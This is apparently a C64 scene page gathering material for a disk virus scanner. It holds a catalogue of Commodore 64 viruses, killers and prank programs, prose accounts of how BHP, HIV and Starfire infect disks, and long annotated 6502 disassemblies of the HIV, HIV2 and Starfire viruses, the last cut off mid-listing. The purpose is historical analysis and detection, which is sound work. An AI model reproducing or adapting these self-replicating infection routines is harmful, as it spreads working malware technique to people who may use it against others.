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Making a Virus Scanner - info needed
as some of you might know i made a little util to scan the disks i transfered for errors (D64scan v0.2,
i thought it would be a useful feature to add virus detection (and possibly elimination) to that tool aswell…
so the question is, who has detailed info on that subject? useful info would be - what virii do exist - how did said virii work - what are existing scanners/cleaners, and how do they work - how do those virii “initially” install
at the very least, i'd need a bunch of “infected” disks (or well, d64s of them), but ofcourse any further info would make things a lot easier :)
the following is a work in progress list of info that i could locate so far.
if you have anything to share that isnt mentioned in this list yet, (especially virus programs, and scanners/killers) don't hesitate to send me a mail also if you feel like adding more comments to one of the disassemblies, feel free to do so, all help is welcomed!
Commodore C64 Virus List v0.2, last updated 09/06/2007 (w) groepaz/hitmen
programs that qualify as "real" virus
Author: Dr.Dr.Strobe & Papa Hacker & Garfield Size: 2030 bytes. (9 Blocks) Type: Memory-resident parasitic prepender. Infects: Commodore 64 Basic files. Payload: Displays text under certain conditions: DR.DR.STROBE&PAPA HACKER WAS HERE! COPROGRAMMER: GARFIELD HALLO DICKERCHEN, DIES IST EIN ECHTER VIRUS! SERIALNO.:2
first virus for the C64 ever, often said to be _the_ first virus in computer history ever (which is not true, there were others before for cp/m, the apple 2e etc).
9 "bhp virus.prg" prg
The following description is a cleaned up and shortened summary of the symantec virus bulletin january 2005 (
(note: this is still messy and may contain errors)
As with all Commodore 64 programs, BHP began with some code written in Basic. This code consisted of a single line, a SYS call to the assembler code, where the rest of the virus resided. Unlike many programs, the virus code built the address to call dynamically. This may have been written by a very careful coder, but it proved to be unnecessary because the address did not change in later versions of the machine.
Once the assembler code gained control, it placed itself in the block of memory that was normally occupied by the I/O devices when the ROM was banked-in.
A side-effect of memory-banking was that it was a great way to hide a program, since the program was not visible if its memory was not banked in. This is the reason why BHP placed its code in banked memory. After copying itself to banked memory, the virus restored the host program to its original memory location and restored the program size to its original value. This allowed the host program to execute as though it were not infected. However, at this time the virus would verify the checksum of the virus?s Basic code, and would overwrite the host memory if the checksum did not match. An interesting note about the checksum routine is that it missed the first three bytes of the code, which were the line number and SYS command. This made the job easier for the person who produced the later variant of the virus. Although the later variant differed only in the line number, this was sufficient to defeat the BHP-Killer program, because BHP-Killer checked the entire Basic code, including the line number.
The virus checked whether it was running already by reading a byte from a specific memory location. If that value matched the expected value, the virus assumed that another copy was running. Thus, writing that value to that memory location would have been an effective inoculation method. If no other copy of the virus was running, the virus would copy some code into a low address in non-banked memory, and hook several vectors, pointing them to the copied code.
The virus hooked the ILOAD, ISAVE, MAIN, NMI, CBINV and RESET vectors. The hooking of MAIN, NMI, CBINV and RESET made the virus Break-proof, Reset-proof, and Run/Stop-Restore-proof.
Once the hooks were in place, the virus ran the host code. The main virus code would be called on every request to load or save a file.
The ILOAD hook was reached when a disk needed to be searched. This happened whenever a directory listing was requested, and could happen when a search was made using a filename with wildcards, or the first time that a file was accessed. Otherwise, the drive hardware cached up to 2kb of data and returned it directly. The virus called the original ILOAD handler, then checked whether an infected program had been loaded. If an infected program had been loaded, the virus restored the host program to its original memory location and restored the program size to its original value. Otherwise, even if no file had been loaded, the virus called the infection routine.
The ISAVE hook was reached whenever a file was saved. The virus called the original ISAVE handler to save the file, then called the infection routine. The infection routine began by checking that the requested device was a disk drive. If so, then the virus opened the first file in the cache. The first file in the cache would be the saved file if this code was reached via the ISAVE hook, otherwise it would be the first file in the directory listing. If the file was a Basic program, then the virus performed a quick infection check by reading the first byte of the program and comparing it against the SYS command.
If the SYS command was present, the virus verified the infection by reading and comparing up to 27 subsequent bytes. A file was considered infected if all 27 bytes matched. If the file was not infected, the virus switched to reading data from the hardware cache. The first check was for a standard disk layout: the directory had to exist on track 18, sector 0, and the file to infect had not to have resided on that track.
If these checks passed, the virus searched the track list for free sectors. It began with the track containing the file to infect, then moved outwards in alternating directions. This reduced the amount of seeking that the drive had to perform in order to read the file afterwards.
If at least eight free sectors existed on the same track, then the virus allocated eight sectors for itself and updated the sector bitmap for that track.
The virus wrote itself to disk in the following manner: the first sector of the host was copied to the last sector allocated by the virus, then that first sector was replaced by the first sector of the virus. After that, the remaining virus code was written to the remaining allocated sectors.
The directory stealth was present here, and it existed without any effort on the part of the virus writer(s). It was a side-effect of the virus not updating the block count in the directory sector. The block count was not used by DOS to load files, its purpose was informational only, since it was displayed by the directory listing.
After any call to ILOAD or ISAVE, the virus checked whether the payload should activate. The conditions for the payload activation were the following: that the machine was operating in ?direct? mode (the command-prompt), that the seconds field of the jiffy clock was a value from 2?4 seconds, and that the current scan line of the vertical retrace was at least 128. This made the activation fairly random. The payload was to display a particular text, one character at a time, while cycling the colours of the border The serial number that was displayed was the number of times the payload check was called. It was incremented once after each call, and it was carried in replications. It reset to zero only after 65,536 calls.
Author: Rogue/The Cult
probably the most known and widespread virus on the C64.
21 "hiv virus /cult" prg (turbo copy infected with hiv) 3 "hiv-virus" prg
The infection stored on the track 18.
It infects only the first 4 file on the disk. It stores the infections on the track 18 sector 0. In this sector the lower nibble of $A7 byte (XXXX0001 means the first file is infected, XXXX0011 means the first and second infected). After the 4th infection, infects the next (5th) file, and deletes the first file.
Software protection: Software protection is partially possible, just set the $A7 byte to XXXX1111 on a disk. If the virus is in the memory, but not was started with RUN command, but we insert another disk with this byte set, the virus assumes, its code already in the directory. Just tries to look for files, delete one, but does not writes its code into the directory.
The virus is 2 block long only, and after an infection, it recovers the original program and starts.
It is possible to copy an infected file with a file copy, so its not impossible to have a file which is infected more than one.
One of the virus scanners scans for this copied behaviour, and displays as file infection type (-F- )not as directory infection type (-D-), and of course we can have a file, which have also a directory type infection, and also as copied file another infection too. (This kind of multiple infection was named as -A- infection type in that scanner.)
Excellent programing work from the author of this virus.
Author: Crossbow/Crest
this is an “optimized” version of the HIV Virus. according to crossbow he never released it into “the wild”, however according to others it is “out there”.
HIV-EXPERT V2.0.prg (hiv expert 1.0 infected with HIV2)
crossbow comments on this one:
“here is my virus, it's contained in the scanner for HIV 1. it scanns the disk for HIV1 (and removes it when it is found) but infects with HIV2. the virus does not use track 18 for itself (like HIV1), but track 19. that way the HIV1 scanner can not find it - but it will likely destroy other programs.”
BU\A Virus
aka: BULA Virus
Author: ?
4 "bu\a 6.13 /virus" prg 4 "bu\a 8.32 /virus" prg
(note: the \ in the filename is supposed to be the pound sign)
aka: Magic Disk Virus
Author: ?
8 "md!-virus" prg 29 "mdv-source" prg 44 "mdv-source.asc" seq
Author: ?
2 "starfire virus" prg
description by Quetzal:
That virus worked by scanning the directory for uninfected programs, grabbing the track + sector link to said prg and replacing it with a T+S link to a copy of the virus (which allocated each copy of itself 2 sectors on the disk more or less at random, thus REALLY screwing up files at times), the original T+S link was placed in the 2nd sector of the virus, so the original prg was then appended after it. Next time that prg was run, after the virus finished its work, a simple memory move to $0801 and a RUN, started the main prg. Can't recall exactly, but I think it also patched various vectors such as LOAD, RUNSTOP/RESTORE etc, giving more chances to be activated, this seems to be a common idea in C64 virus.
Author: Kobold/Frogs
this one is kinda nasty, it installs the infection routine in a fastcrueled program, and thus is a lot harder to scan for than for other virii (the infected program must be unpacked to check for the infection routine)
38 "fastcruel4.0+frg" prg
Author: ?
(currently only found a scanner/remover for this one, not the actual virus. there is a small chance that its a fake. need to analyze the scanner, however it is a basic-boss compiled program which is almost impossible to read without a lot of effort, so that has to wait - finding the virus itself would save a LOT of work!)
virus-scanners and -killers
11 "tdf virus killer" prg "BHP Virus Killer" by T.D.F.
4 "hiv scaner /cult" prg "hiv virus scaner" by Cliff/The Cult/WOW 42 "hiv warning/cult" prg usage/warning note 24 "hiv-expert v1.00" prg "hiv-expert v1.00" by Rico/Nipson 5 "hiv-virus-ki.prg" prg "Virus Killer 1.0" by Jer/Panic Design 1 "hiv-virus-scann." prg "HIV Virus File Scan v1" 9 "poopoopoopoopoop" prg 5 "hiv-virus-killer" prg "Virus Killer 1.0" by Jer/Panic Design HIV-Finder "HIV Finder v2.2" by Gringo
6 "star killer v1.0" prg "star killer v1.0" by Quetzal/Chrome (Daniel Martin)
11 "protector" prg "Magic Disk Virus Protector V2.0"
29 "coder-virus kill" prg "Coder Virus Killer v0.9" by Pumpkin/Lower Level 43 "noter to coder v" prg usage/warning note
others/generic (?)
Virus Killer "Virus Killer" by Raven Softworks Virus Killer v1.1 "Virus Killer v1.1" by The Atomic Two Industries 6 "virus kill. v2.4" prg "Virus Killer v2.4" by Exen/Fatum
Offtopic: pranks and fakes and other generally harmless programs
the following programs are listed to avoid confusion with “real” virii. they are all 100% harmless (promised).
Antivirus V4.0
Quetzal comments on this one: “This is a well designed fake. The code for “checking” for a virus consists of randomly choosing from the list of available viruses - most of which I doubt ever existed.”
29 "antivirus v4.0" prg "Antivirus V4.0" by JTX
Author: Matthias Weber, released by CSD and Magic Disk
not a real virus (it does not infect other programs/disks). this is a prank program released on magic disk.
50 "wag-virus" prg 10 "sample 0a" prg 32 "sample 0b" prg 17 "sample 0c" prg 41 "sample 0d" prg 28 "sample 0e" prg 11 "sample 0f" prg 6 "sample 0g" prg 31 "sample 0h" prg 41 "sample 0i" prg 48 "sample 0j" prg 2 "wag virus-killer" prg
aka: Karstadt Demo
Author: ?
not a real virus (it does not infect other programs/disks). this is a prank program released by an unknown author
Analysis: HIV
07FD .byte $xx,$xx,$xx ;simple filler bytes to easier understand the sending to the drive 0800 .byte $00,$0b,$08,$c8,$07,$9e,$32,$30,$35,$39,$00 ; basic stub start .C:080b 2C 00 DD BIT $DD00 ;checks that code already runnin' in the drive(?) .C:080e 10 49 BPL $0859 ;if yes, then skip the memory upload, go to the restore of the original ;this block sends the virus code into the drive buffer 0400 and 0500 (2 pages) ;there is two byte alignment because the first two bytes of a block is load address .C:0810 A9 0F LDA #$0F ;.A=$ff=#$0f .C:0812 85 FF STA $FF ; 15 x 20 byte need to sent to the drive .C:0814 A0 00 LDY #$00 ;low byte of block set to #$0 and store to the M-W command .C:0816 8C A0 08 STY $08A0 ;storing address to the M-W command .C:0819 20 A4 08 JSR $08A4 ;open drive .C:081c A2 05 LDX #$05 ;send "M-W" address: $0400 length: 20 command to the 1541 .C:081e BD 9E 08 LDA $089E,X .C:0821 20 DD ED JSR $EDDD .C:0824 CA DEX .C:0825 10 F7 BPL $081E .C:0827 A2 20 LDX #$20 ;send the virus code to the drive in $20 length blocks .C:0829 B9 FD 07 LDA $07FD,Y ;from $07FD to ((($09DD(?) ($01E0) (?)))) .C:082c 20 DD ED JSR $EDDD ;send a byte to drive .C:082f C8 INY .C:0830 D0 0D BNE $083F ;when crossing the buffer border, .C:0832 EE 2B 08 INC $082B ;increment the source address and .C:0835 EE 9F 08 INC $089F ;increment the buffer address and .C:0838 C8 INY ;increment the .Y (first two byte is load address) .C:0839 C8 INY .C:083a A9 FB LDA #$FB .C:083c 8D 2A 08 STA $082A .C:083f CA DEX .C:0840 D0 E7 BNE $0829 .C:0842 20 AE FF JSR $FFAE ;send unlisten, when 20 byte was sent .C:0845 C6 FF DEC $FF .C:0847 D0 CD BNE $0816 .C:0849 20 A4 08 JSR $08A4 ;start the code in the drive .C:084c A9 55 LDA #$55 ;send U4 code to drive then close the channel .C:084e 20 DD ED JSR $EDDD ;this starts the drive code at bank 4 (starts on $0503) .C:0851 A9 34 LDA #$34 .C:0853 20 DD ED JSR $EDDD .C:0856 20 AE FF JSR $FFAE ;preparation for the restore of the original program ;this block copies the restore routine (54 bytes with pointers) to the $0100 .C:0859 A0 36 LDY #$36 ;this block copies the following block to $FC- .C:085b B9 67 08 LDA $0867,Y ;zero page pointers at $FC code at $0100 .C:085e 99 FC 00 STA $00FC,Y .C:0861 88 DEY .C:0862 10 F7 BPL $085B .C:0864 4C 00 01 JMP $0100 ;zero page pointers for the the copy of original data ( ;(this will be copied to $FC and used from the code copied to $0100) ;$FC-FF commodore 64 memory .C:0867 04 07 ;$FC-$FD ;these will be the zero page pointers after copy .C:0869 00 09 ;$FE-$FF ;restore the original program to run ;(this will be copied to $0100 and runs there) ;$0100 commodore 64 memory .C:086b A9 36 LDA #$36 .C:086d 85 01 STA $01 .C:086f A6 AF LDX $AF .C:0871 A0 FD LDY #$FD ;this block moves the original program in the memory to .C:0873 B1 FE LDA ($FE),Y ;correct place ($0801 = $0704+$fd) then runs it .C:0875 91 FC STA ($FC),Y .C:0877 C8 INY .C:0878 D0 04 BNE $087E .C:087a E6 FD INC $FD .C:087c E6 FF INC $FF .C:087e C4 AE CPY $AE .C:0880 D0 F1 BNE $0873 .C:0882 E4 FF CPX $FF .C:0884 D0 ED BNE $0873 .C:0886 98 TYA .C:0887 38 SEC .C:0888 E9 FC SBC #$FC .C:088a 85 AE STA $AE .C:088c 85 2D STA $2D .C:088e A5 FF LDA $FF .C:0890 E9 01 SBC #$01 .C:0892 85 AF STA $AF .C:0894 85 2E STA $2E .C:0896 E6 01 INC $01 .C:0898 20 59 A6 JSR $A659 .C:089b 4C AE A7 JMP $A7AE ;restore of the original finished, runs the original program ;memory write command in backwards order .C:089e 20 04 A0 ; dest. address: $0400 length: $20 ($a0 was overwriten by the virus with #$00 at the start) .C:08a1 57 2D 4D ;"W-M" ;drive handling subroutine ;this is used to open prepare drive .C:08a4 A9 08 LDA #$08 ;open drive 8 (possible bug, it can't infect other drive :) ) .C:08a6 20 0C ED JSR $ED0C .C:08a9 A9 6F LDA #$6F ;secondary address set .C:08ab 4C B9 ED JMP $EDB9 ;and implicit return to the call ;------- ;this code run in the drive after to $0400- copied ;1541 memory $04b4 .C:08ae A9 90 LDA #$90 ; write sector jobcode ;1541 memory $04b6 .C:08b0 2C A9 80 BIT $80A9 .C:08b3 A2 03 LDX #$03 ;write out buffer 3 and wait until finishes .C:08b5 95 00 STA $00,X ;to store to bank 3 ($0600-06FF) .C:08b7 B5 00 LDA $00,X .C:08b9 30 FC BMI $08B7 ;wait until bit 7 is set (job is finished) .C:08bb C9 01 CMP #$01 .C:08bd F0 02 BEQ $08C1 ;if error is ok then return .C:08bf 68 PLA ;else remove two byte from stack then return .C:08c0 68 PLA .C:08c1 60 RTS .C:08c2 A0 02 LDY #$02 .C:08c4 A9 00 LDA #$00 .C:08c6 91 C0 STA ($C0),Y .C:08c8 A0 04 LDY #$04 .C:08ca B1 C0 LDA ($C0),Y .C:08cc A2 03 LDX #$03 .C:08ce DD C6 05 CMP $05C6,X .C:08d1 F0 05 BEQ $08D8 .C:08d3 CA DEX .C:08d4 10 F8 BPL $08CE .C:08d6 30 09 BMI $08E1 .C:08d8 BD F6 04 LDA $04F6,X .C:08db 49 FF EOR #$FF .C:08dd 25 C3 AND $C3 .C:08df 85 C3 STA $C3 .C:08e1 4C 4F 05 JMP $054F .C:08e4 A9 00 LDA #$00 .C:08e6 85 0D STA $0D ;set buffer 3 sector to 0 .C:08e8 20 B4 04 JSR $04B4 .C:08eb A5 C3 LDA $C3 .C:08ed 8D A7 06 STA $06A7 .C:08f0 4C B1 04 JMP $04B1 .C:08f3 08 PHP .C:08f4 04 02 NOOP $02 .C:08f6 01 0F ORA ($0F,X) .C:08f8 4C C5 04 JMP $04C5 ; 1541 memory $0500 .C:08fb 00 BRK .C:08fc 00 BRK .C:08fd 00 BRK ; 1541 memory $0503 (it was started with U4) .C:08fe A0 02 LDY #$02 .C:0900 8C 00 18 STY $1800 ;set clock in high (semafor for the computer, "i am running here! :) " ) .C:0903 A9 08 LDA #$08 ;$08 .C:0905 8D 03 04 STA $0403 ;store #$0801 as load address to the $0400 (buffer 1) .C:0908 88 DEY .C:0909 84 C2 STY $C2 ;$c2 = 01 .C:090b 8C 02 04 STY $0402 ;$01 (y=1) .C:090e 88 DEY ;y=0 .C:090f 84 0D STY $0D ;Buffer 3 track set to 0 .C:0911 84 C0 STY $C0 ;$C0 = 00 .C:0913 A9 12 LDA #$12 ;set buffer 1-3 to track 18 ($12) ($0400-06ff to track 18) .C:0915 8D 00 04 STA $0400 ;set track data in the buffer #1 too .C:0918 85 08 STA $08 .C:091a 85 0A STA $0A .C:091c 85 0C STA $0C .C:091e A9 06 LDA #$06 .C:0920 85 C1 STA $C1 ;$c1 = 06 .C:0922 A9 04 LDA #$04 .C:0924 2C 00 18 BIT $1800 ;wait until clock out is high .C:0927 10 FB BPL $0924 .C:0929 D0 F9 BNE $0924 .C:092b 20 18 C1 JSR $C118 ;turn on drive led .C:092e A9 B0 LDA #$B0 .C:0930 20 B6 04 JSR $04B6 ; .C:0933 20 B4 04 JSR $04B4 .C:0936 AD A7 06 LDA $06A7 .C:0939 85 C3 STA $C3 .C:093b E6 0D INC $0D .C:093d 20 B4 04 JSR $04B4 .C:0940 A0 02 LDY #$02 .C:0942 B1 C0 LDA ($C0),Y .C:0944 29 8F AND #$8F .C:0946 C9 82 CMP #$82 .C:0948 F0 15 BEQ $095F ;1541 memory $054f .C:094a A5 C0 LDA $C0 .C:094c 18 CLC .C:094d 69 20 ADC #$20 .C:094f 85 C0 STA $C0 .C:0951 90 ED BCC $0940 .C:0953 20 B1 04 JSR $04B1 .C:0956 AD 01 06 LDA $0601 .C:0959 85 0D STA $0D .C:095b 10 E0 BPL $093D .C:095d F0 83 BEQ $08E2 .C:095f C8 INY .C:0960 B1 C0 LDA ($C0),Y .C:0962 8D 00 05 STA $0500 .C:0965 C9 12 CMP #$12 .C:0967 D0 0D BNE $0976 .C:0969 A0 18 LDY #$18 .C:096b B1 C0 LDA ($C0),Y .C:096d F0 87 BEQ $08F6 .C:096f 38 SEC .C:0970 E9 01 SBC #$01 .C:0972 91 C0 STA ($C0),Y .C:0974 B0 D4 BCS $094A .C:0976 C8 INY .C:0977 B1 C0 LDA ($C0),Y .C:0979 8D 01 05 STA $0501 .C:097c A2 03 LDX #$03 .C:097e A5 C3 LDA $C3 .C:0980 3D F6 04 AND $04F6,X .C:0983 F0 05 BEQ $098A .C:0985 CA DEX .C:0986 10 F6 BPL $097E .C:0988 30 C0 BMI $094A .C:098a A5 C3 LDA $C3 .C:098c 1D F6 04 ORA $04F6,X .C:098f 85 C3 STA $C3 .C:0991 BD C6 05 LDA $05C6,X .C:0994 91 C0 STA ($C0),Y .C:0996 85 09 STA $09 .C:0998 88 DEY .C:0999 A9 12 LDA #$12 .C:099b 91 C0 STA ($C0),Y .C:099d BD CA 05 LDA $05CA,X .C:09a0 8D 01 04 STA $0401 .C:09a3 85 0B STA $0B .C:09a5 A0 18 LDY #$18 .C:09a7 A9 04 LDA #$04 .C:09a9 91 C0 STA ($C0),Y .C:09ab A2 01 LDX #$01 .C:09ad A9 90 LDA #$90 .C:09af 20 B8 04 JSR $04B8 .C:09b2 E8 INX .C:09b3 A9 90 LDA #$90 .C:09b5 20 B8 04 JSR $04B8 .C:09b8 C6 C2 DEC $C2 .C:09ba D0 8E BNE $094A .C:09bc 20 B1 04 JSR $04B1 .C:09bf F0 9C BEQ $095D .C:09c1 11 06 ORA ($06),Y .C:09c3 0C 12 0E NOOP $0E12 .C:09c6 03 09 SLO ($09,X) .C:09c8 0F 1D 1E SLO $1E1D .C:09cb 1D 18 15 ORA $1518,X .C:09ce 13 12 SLO ($12),Y .C:09d0 00 BRK .C:09d1 00 BRK .C:09d2 00 BRK .C:09d3 00 BRK .C:09d4 00 BRK .C:09d5 00 BRK .C:09d6 00 BRK .C:09d7 00 BRK .C:09d8 00 BRK .C:09d9 00 BRK .C:09da 00 BRK .C:09db 00 BRK .C:09dc 00 BRK .C:09dd 1E 19 0E ASL $0E19,X .C:09e0 19 0A 09 ORA $090A,Y .C:09e3 0A ASL A .C:09e4 15 0E ORA $0E,X .C:09e6 0F 0A 0F SLO $0F0A .C:09e9 0D 0A 15 ORA $150A .C:09ec 19 13 16 ORA $1613,Y .C:09ef 0F 0A 0A SLO $0A0A .C:09f2 13 0E SLO ($0E),Y .C:09f4 1A NOOP .C:09f5 0A ASL A .C:09f6 1A NOOP .C:09f7 09 0A ORA #$0A .C:09f9 0E 1A 2C ASL $2C1A .C:09fc 0B (infected program follows)
Analysis: HIV2
; basic stub 0801 .byte $0c,$08,$c9,$07,$9e,$ff,$ac,$36,$35,$36,$00 ; send drivecode ; move copyloop to stack ; start drivecode ; start copyloop start: .C:080c A0 00 LDY #$00 .C:080e 8C 7F 08 STY $087F .C:0811 20 3B 08 JSR $083B ; M-W $0500 .C:0814 AA TAX .C:0815 B9 FD 07 LDA $07FD,Y .C:0818 20 DD ED JSR $EDDD .C:081b C8 INY .C:081c CA DEX .C:081d D0 F6 BNE $0815 .C:081f AA TAX .C:0820 20 AE FF JSR $FFAE .C:0823 98 TYA .C:0824 D0 E8 BNE $080E .C:0826 8E 80 08 STX $0880 ; change the M-W to M-E $0500 .C:0829 BD 51 08 LDA $0851,X .C:082c 9D 00 01 STA $0100,X .C:082f CA DEX .C:0830 10 F7 BPL $0829 .C:0832 20 3B 08 JSR $083B ; M-E .C:0835 20 AE FF JSR $FFAE .C:0838 4C 00 01 JMP $0100 ; send M-W .C:083b A9 08 LDA #$08 .C:083d 20 0C ED JSR $ED0C .C:0840 A9 6F LDA #$6F .C:0842 20 B9 ED JSR $EDB9 .C:0845 A2 05 LDX #$05 .C:0847 BD 7D 08 LDA $087D,X .C:084a 20 DD ED JSR $EDDD .C:084d CA DEX .C:084e 10 F7 BPL $0847 .C:0850 60 RTS ; originally at $0851 ; transfered to $0100 ; copies original program back to ; where it belongs and runs it .C:0851 78 SEI .C:0852 E6 01 INC $01 .C:0854 BD 00 08 LDA $0800,X .C:0857 9D 02 07 STA $0702,X .C:085a E8 INX .C:085b D0 F7 BNE $0854 .C:085d EE 08 01 INC $0108 .C:0860 EE 05 01 INC $0105 .C:0863 D0 EF BNE $0854 .C:0865 A5 2D LDA $2D .C:0867 38 SEC .C:0868 E9 FE SBC #$FE .C:086a 85 2D STA $2D .C:086c 85 AE STA $AE .C:086e B0 04 BCS $0874 .C:0870 C6 2E DEC $2E .C:0872 C6 AF DEC $AF .C:0874 C6 01 DEC $01 .C:0876 58 CLI .C:0877 20 59 A6 JSR $A659 .C:087a 4C AE A7 JMP $A7AE 087d .byte $20,$05,$e0,"W","-","M" ; drivecode .C:0883 85 14 STA $14 .C:0885 85 07 STA $07 .C:0887 A9 B0 LDA #$B0 .C:0889 20 D9 05 JSR $05D9 .C:088c A9 80 LDA #$80 .C:088e 20 D9 05 JSR $05D9 .C:0891 A0 01 LDY #$01 .C:0893 B1 14 LDA ($14),Y .C:0895 29 8F AND #$8F .C:0897 C9 82 CMP #$82 .C:0899 F0 0F BEQ $08AA .C:089b A5 14 LDA $14 .C:089d 18 CLC .C:089e 69 20 ADC #$20 .C:08a0 85 14 STA $14 .C:08a2 90 ED BCC $0891 .C:08a4 AD 01 03 LDA $0301 .C:08a7 10 DC BPL $0885 .C:08a9 60 RTS .C:08aa C8 INY .C:08ab B1 14 LDA ($14),Y .C:08ad C9 13 CMP #$13 .C:08af F0 EA BEQ $089B .C:08b1 8D 00 05 STA $0500 .C:08b4 A9 13 LDA #$13 .C:08b6 91 14 STA ($14),Y .C:08b8 85 0A STA $0A .C:08ba C8 INY .C:08bb B1 14 LDA ($14),Y .C:08bd 8D 01 05 STA $0501 .C:08c0 A9 11 LDA #$11 .C:08c2 91 14 STA ($14),Y .C:08c4 85 0B STA $0B .C:08c6 A8 TAY .C:08c7 88 DEY .C:08c8 10 02 BPL $08CC .C:08ca A0 12 LDY #$12 .C:08cc 8C C4 05 STY $05C4 .C:08cf 20 D7 05 JSR $05D7 .C:08d2 A2 05 LDX #$05 .C:08d4 A9 90 LDA #$90 .C:08d6 95 FD STA $FD,X .C:08d8 B5 FD LDA $FD,X .C:08da 30 FC BMI $08D8 .C:08dc 60 RTS .C:08dd A2 03 LDX #$03 .C:08df 86 15 STX $15 .C:08e1 8E 00 18 STX $1800 .C:08e4 A9 12 LDA #$12 .C:08e6 85 06 STA $06 .C:08e8 A9 08 LDA #$08 .C:08ea 8D 03 05 STA $0503 .C:08ed 2C 00 18 BIT $1800 .C:08f0 10 FB BPL $08ED .C:08f2 20 18 C1 JSR $C118 .C:08f5 A9 01 LDA #$01 .C:08f7 8D 02 05 STA $0502 .C:08fa D0 87 BNE $0883 .C:08fc 45 01 EOR $01 (infected program follows)
Analysis: Starfire
; basic stub 0800 .byte $00,$0b,$08,$c8,$07,$9e,$32,$30,$36,$31,$00,$00,$00 start .C:080d A9 0F LDA #$0F .C:080f A8 TAY .C:0810 A2 08 LDX #$08 .C:0812 20 00 FE JSR $FE00 .C:0815 25 A2 AND $A2 .C:0817 85 05 STA $05 .C:0819 E6 05 INC $05 .C:081b 20 4A F3 JSR $F34A .C:081e BD FB 08 LDA $08FB,X .C:0821 9D 00 CE STA $CE00,X .C:0824 E8 INX .C:0825 D0 F7 BNE $081E .C:0827 A9 12 LDA #$12 .C:0829 85 FE STA $FE .C:082b A9 01 LDA #$01 .C:082d 85 FD STA $FD .C:082f A0 E3 LDY #$E3 .C:0831 20 F9 FD JSR $FDF9 .C:0834 A7 2C LAX $2C .C:0836 A8 TAY .C:0837 20 00 FE JSR $FE00 .C:083a 20 4A F3 JSR $F34A .C:083d 20 15 09 JSR $0915 .C:0840 AE 15 CF LDX $CF15 .C:0843 86 03 STX $03 .C:0845 E0 08 CPX #$08 .C:0847 30 03 BMI $084C .C:0849 4C 66 09 JMP $0966 .C:084c EE 15 CF INC $CF15 .C:084f A9 E3 LDA #$E3 .C:0851 18 CLC .C:0852 69 20 ADC #$20 .C:0854 CA DEX .C:0855 10 FA BPL $0851 .C:0857 AA TAX .C:0858 BD 00 CF LDA $CF00,X .C:085b 8D 00 CE STA $CE00 .C:085e A5 05 LDA $05 .C:0860 9D 00 CF STA $CF00,X .C:0863 E8 INX .C:0864 BD 00 CF LDA $CF00,X .C:0867 8D 01 CE STA $CE01 .C:086a A5 03 LDA $03 .C:086c 0A ASL A .C:086d 9D 00 CF STA $CF00,X .C:0870 20 F5 08 JSR $08F5 .C:0873 A5 05 LDA $05 .C:0875 85 FE STA $FE .C:0877 A5 03 LDA $03 .C:0879 0A ASL A .C:087a A8 TAY .C:087b C8 INY .C:087c 84 04 STY $04 .C:087e 20 AA 08 JSR $08AA .C:0881 BD 01 08 LDA $0801,X .C:0884 9D 04 CE STA $CE04,X .C:0887 E8 INX .C:0888 D0 F7 BNE $0881 .C:088a A4 04 LDY $04 .C:088c 8C 01 CE STY $CE01 .C:088f 88 DEY .C:0890 20 55 09 JSR $0955 .C:0893 A9 0F LDA #$0F .C:0895 20 91 F2 JSR $F291 .C:0898 20 2F F3 JSR $F32F .C:089b 78 SEI .C:089c A2 20 LDX #$20 .C:089e BD D8 08 LDA $08D8,X .C:08a1 9D 3F 03 STA $033F,X .C:08a4 CA DEX .C:08a5 D0 F7 BNE $089E .C:08a7 4C 40 03 JMP $0340 .C:08aa 84 FD STY $FD .C:08ac A2 00 LDX #$00 .C:08ae BD 00 CE LDA $CE00,X .C:08b1 9D 00 CF STA $CF00,X .C:08b4 E8 INX .C:08b5 D0 F7 BNE $08AE .C:08b7 4C F5 08 JMP $08F5 .C:08ba A2 0F LDX #$0F .C:08bc 20 50 F2 JSR $F250 .C:08bf A0 08 LDY #$08 .C:08c1 A9 C9 LDA #$C9 .C:08c3 20 1E AB JSR $AB1E .C:08c6 4C 33 F3 JMP $F333 08c9 .byte "B","-","P",":","8",",","0",$00 08d1 .byte "U","1",":","8",",","0",",",$00 ; copied to $0340 .C:08d9 E6 01 INC $01 .C:08db BD FD 09 LDA $09FD,X .C:08de 9D 01 08 STA $0801,X .C:08e1 E8 INX .C:08e2 D0 F7 BNE $08DB .C:08e4 EE 47 03 INC $0347 .C:08e7 EE 44 03 INC $0344 .C:08ea D0 EF BNE $08DB .C:08ec C6 01 DEC $01 .C:08ee 58 CLI .C:08ef 20 59 A6 JSR $A659 .C:08f2 4C AE A7 JMP $A7AE .C:08f5 20 BA 08 JSR $08BA .C:08f8 A9 32 LDA #$32 .C:08fa 8D D2 08 STA $08D2 .C:08fd A2 08 LDX #$08 .C:08ff 20 50 F2 JSR $F250 .C:0902 A0 00 LDY #$00 .C:0904 B9 00 CF LDA $CF00,Y .C:0907 20 DD ED JSR $EDDD .C:090a C8 INY .C:090b D0 F7 BNE $0904 .C:090d A2 0F LDX #$0F .C:090f 20 50 F2 JSR $F250 .C:0912 4C 38 09 JMP $0938 .C:0915 20 BA 08 JSR $08BA .C:0918 A2 0F LDX #$0F .C:091a 20 50 F2 JSR $F250 .C:091d A9 31 LDA #$31 .C:091f 8D D2 08 STA $08D2 .C:0922 20 38 09 JSR $0938 .C:0925 A2 08 LDX #$08 .C:0927 20 0E F2 JSR $F20E .C:092a A0 00 LDY #$00 .C:092c 20 57 F1 JSR $F157 .C:092f 99 00 CF STA $CF00,Y .C:0932 C8 INY .C:0933 D0 F7 BNE $092C .C:0935 4C 33 F3 JMP $F333 .C:0938 A9 D1 LDA #$D1 .C:093a A0 08 LDY #$08 .C:093c 20 1E AB JSR $AB1E .C:093f A9 00 LDA #$00 .C:0941 A6 FE LDX $FE .C:0943 20 CD BD JSR $BDCD .C:0946 A9 2C LDA #$2C .C:0948 20 CA F1 JSR $F1CA .C:094b A9 00 LDA #$00 .C:094d A6 FD LDX $FD .C:094f 20 CD BD JSR $BDCD .C:0952 4C B5 AB JMP $ABB5 .C:0955 A5 05 LDA $05 .C:0957 8D 00 CE STA $CE00 .C:095a E8 INX .C:095b 8E 02 CE STX $CE02 .C:095e A9 08 LDA #$08 .C:0960 8D 03 CE STA $CE03 .C:0963 4C AA 08 JMP $08AA .C:0966 A8 TAY .C:0967 B9 00 08 LDA $0800,Y .C:096a 99 00 CD STA $CD00,Y .C:096d C8 INY .C:096e D0 F7 BNE $0967 .C:0970 A9 CE LDA #$CE .C:0972 8D 86 02 STA $0286 .C:0975 8D 31 03 STA $0331 .C:0978 A9 8F LDA #$8F .C:097a 8D 30 03 STA $0330 .C:097d A9 14 LDA #$14 